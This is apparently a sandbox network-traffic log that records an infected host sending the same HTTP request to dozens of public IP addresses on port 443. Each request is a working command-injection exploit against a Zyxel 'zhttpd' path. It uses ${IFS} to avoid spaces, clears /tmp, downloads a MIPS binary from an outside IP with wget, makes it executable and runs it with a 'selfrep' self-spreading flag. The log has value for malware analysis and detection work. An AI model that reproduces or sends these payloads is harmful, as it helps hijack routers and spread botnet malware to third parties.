                                                Jan 29, 2024 07:08:01.615097046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7782192.168.2.2341890213.18.222.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615139008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7783192.168.2.2337754159.99.229.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615185976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7784192.168.2.2354124151.19.122.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615247965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7785192.168.2.233820035.206.212.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615283966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7786192.168.2.233969670.232.23.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615314007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7787192.168.2.2355616101.222.236.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615349054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7788192.168.2.235143877.16.82.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615411043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7789192.168.2.2336410190.125.246.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615443945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7790192.168.2.2338800183.237.249.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615508080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7791192.168.2.2360350170.103.92.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615534067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7792192.168.2.2346532137.11.78.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615587950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7793192.168.2.2341868112.235.43.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615619898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7794192.168.2.234112689.45.68.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615629911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7795192.168.2.234028266.92.20.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615684986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7796192.168.2.2360914103.51.193.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615730047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7797192.168.2.2341544184.252.154.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615768909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7798192.168.2.235528080.146.245.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615817070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7799192.168.2.2356400204.40.150.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615828991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7800192.168.2.234710043.234.96.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615892887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7801192.168.2.235427459.36.23.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615935087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7802192.168.2.2340690161.224.36.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.615968943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7803192.168.2.236093085.244.146.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616002083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7804192.168.2.2345990198.199.50.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616039991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7805192.168.2.235352857.135.7.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616075993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7806192.168.2.2339746189.235.216.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616142988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7807192.168.2.2346612149.222.135.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616168022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7808192.168.2.233681667.2.41.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616211891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7809192.168.2.2353260119.101.108.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616274118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7810192.168.2.234027671.73.99.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616300106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7811192.168.2.234193464.175.133.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616362095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7812192.168.2.2357058129.211.156.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616408110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7813192.168.2.2342310129.169.255.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616458893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7814192.168.2.234744014.233.81.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616511106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7815192.168.2.2334540221.224.210.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616535902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7816192.168.2.2335646121.94.88.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616578102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7817192.168.2.2346620126.101.173.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616611958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7818192.168.2.235701824.215.55.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616671085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7819192.168.2.234968494.235.82.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616707087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7820192.168.2.2339316106.59.137.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616743088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7821192.168.2.2350926181.69.47.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616777897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7822192.168.2.2332980138.163.158.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616808891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7823192.168.2.233922275.228.230.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616852999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7824192.168.2.2358864170.238.160.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616902113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7825192.168.2.2350484104.115.81.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616938114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7826192.168.2.233378891.92.91.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.616974115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7827192.168.2.235074044.237.43.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617021084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7828192.168.2.2347856218.36.160.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617034912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7829192.168.2.234491261.168.243.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617109060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7830192.168.2.234625092.3.53.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617145061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7831192.168.2.2354030204.196.120.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617187023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7832192.168.2.235918873.242.92.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617223978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7833192.168.2.2346888149.27.213.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617280960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7834192.168.2.2358262187.218.237.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617312908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7835192.168.2.235211257.7.163.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617355108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7836192.168.2.235192098.239.65.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617392063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7837192.168.2.2354858152.80.34.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617460012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7838192.168.2.2359218161.175.155.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617522955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7839192.168.2.2353144159.19.171.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617554903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7840192.168.2.2340578130.170.112.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617593050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7841192.168.2.2337782133.96.75.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617640018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7842192.168.2.233888219.1.36.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617698908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7843192.168.2.234357052.29.206.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617733955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7844192.168.2.2352254222.172.156.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617784023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7845192.168.2.2335144208.55.119.93443
                                                TimestampBytes transferredDirectionData
